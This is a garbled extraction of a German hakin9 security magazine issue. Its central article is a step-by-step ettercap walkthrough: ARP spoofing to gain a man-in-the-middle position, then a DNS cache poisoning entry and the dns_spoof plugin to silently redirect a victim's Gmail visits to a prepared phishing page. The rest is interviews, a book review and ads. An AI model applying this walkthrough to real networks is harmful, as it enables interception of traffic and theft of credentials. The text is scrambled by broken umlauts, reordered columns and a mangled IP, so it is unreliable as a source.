Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
